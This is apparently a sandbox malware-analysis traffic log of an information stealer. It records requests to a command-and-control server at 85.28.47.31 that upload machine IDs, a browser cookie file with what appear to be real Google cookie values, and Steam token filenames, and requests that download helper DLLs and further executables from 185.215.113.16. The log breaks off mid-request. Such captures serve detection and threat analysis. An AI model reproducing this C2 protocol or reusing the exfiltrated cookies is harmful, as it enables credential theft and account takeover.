Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:10:08 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 17:31:31 GMTConnection: keep-aliveETag: "66a3dd73-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"sila------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"browsers------KEHJKJDGCGDAKFHIDBGC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="message"plugins------GIEHJDHCBAEHJJJKKFID--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"fplugins------CBKJJEHCBAKFBFHJKFBK--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFHost: 85.28.47.31Content-Length: 7291Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="file"------IEHCBAFIDAECBGCBFHJE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="file"------KKEHIEBKJKFIEBGDGDAA--
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="message"wallets------IIEBGIDAAFHIJJJJEGCG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="message"ybncbhylepme------GCAKKECAEGDGCBFIJEGH--
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"1f6355dea5cfd1095225e483c6052f30d19e6babc5addcc74eeab1de51ebb27aa6f6e51f------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="file"------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 66 36 33 35 35 64 65 61 35 63 66 64 31 30 39 35 32 32 35 65 34 38 33 63 36 30 35 32 66 33 30 64 31 39 65 36 62 61 62 63 35 61 64 64 63 63 37 34 65 65 61 62 31 64 65 35 31 65 62 62 32 37 61 61 36 66 36 65 35 31 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 